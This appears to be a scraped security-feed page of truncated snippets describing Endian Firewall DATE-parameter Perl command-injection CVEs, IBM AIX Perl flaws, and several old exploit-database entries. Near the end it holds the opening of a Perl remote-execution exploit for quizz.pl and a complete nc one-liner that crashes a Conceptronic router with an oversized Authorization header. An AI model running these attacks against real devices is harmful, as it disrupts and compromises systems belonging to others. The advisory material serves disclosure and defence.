CVE-2026-34797 Endian Firewall /cgi-bin/logs_smtp.cgi DATE Perl Command Injection

Endian Firewall version 3.3.25 and prior allow authenticated users to execute arbitrary OS commands via the DATE parameter to /cgi-bin/logssmtp.cgi. The DATE parameter value is used to construct a file path that is passed to a Perl open call, which allows command injection due to an incomplete...

CVE-2026-34797

CVE-2026-34797 - Endian Firewall : Endian Firewall versions 3.3.25 and earlier are affected. Authenticated users can run arbitrary OS commands via the DATE parameter in /cgi-bin/logs_smtp.cgi. The value is used to build a file path passed to a Perl open() call, with incomplete regex validation en...

CVE-2026-34795 Endian Firewall /cgi-bin/logs_log.cgi DATE Perl Command Injection

Endian Firewall version 3.3.25 and prior allow authenticated users to execute arbitrary OS commands via the DATE parameter to /cgi-bin/logslog.cgi. The DATE parameter value is used to construct a file path that is passed to a Perl open call, which allows command injection due to an incomplete...

CVE-2026-34795

Endian Firewall versions up to 3.3.25 are affected by a command injection vulnerability in the CGI endpoint /cgi-bin/logs_log.cgi, exploitable by authenticated users via the DATE parameter. The input is used to build a file path passed to a Perl open() call, with incomplete regular expression val...

CVE-2026-34796

Endian Firewall, up to version 3.3.25, is affected by a command-injection in /cgi-bin/logs_openvpn.cgi via the DATE parameter. The root cause is incomplete regular-expression validation that allows the DATE value to be used in a Perl open() call, enabling authenticated users with low privileges a...

CVE-2026-34792

CVE-2026-34792 – Endian Firewall : Affects Endian Firewall 3.3.25 and prior. An authenticated user can execute arbitrary OS commands via the DATE parameter to /cgi-bin/logs_clamav.cgi. The DATE value builds a file path that is passed to a Perl open() call, allowing command injection due to incomp...

Security Bulletin: AIX/VIOS is vulnerable to arbitrary command execution due to Perl (CVE-2025-33112)

Summary Vulnerability in AIX's Perl could allow an attacker to execute arbitrary commands CVE-2025-33112. AIX uses Perl in various operating system components. Vulnerability Details CVEID:CVE-2025-33112 DESCRIPTION: IBM AIX's Perl implementation could allow a non-privileged local user to exploit ...

CVE-2024-25021 IBM AIX command execution

IBM AIX 7.3, VIOS 4.1's Perl implementation could allow a non-privileged local user to exploit a vulnerability to execute arbitrary commands. IBM X-Force ID: 281320...

Exploit for Path Traversal in Citrix Application_Delivery_Controller_Firmware

Citrix Unauthorized Remote Code Execution Attacker - CVE-2019-...

quizz 1.01 - quizz.pl Remote Command Execution

quizz 1.01 - quizz.pl Remote Command Execution !/usr/bin/perl quizz.p exploit by FOXMULDER [email protected] Vulnerability foud by WBYTE. Born to be root !!! !!!!!!!!!!!!!!!THANKS to WBYTE !!!!!!!!!!!!!!!!! FACT:Wbyte doesn't sleeps , he waits !. 0day use IO::Socket; use LWP::Simple; sub Usage pri...

Conceptronic CADSLR1 Router - Denial of Service

$ $victima="ip.victim" $ perl -e 'print "GET / HTTP/1.1\r\nHost: '"$victima"'\r\nAuthorization: Basic " . 'A' x 65536 . "\r\n\r\n"' | nc -vvn $victima 80 milw0rm.com 2004-07-22...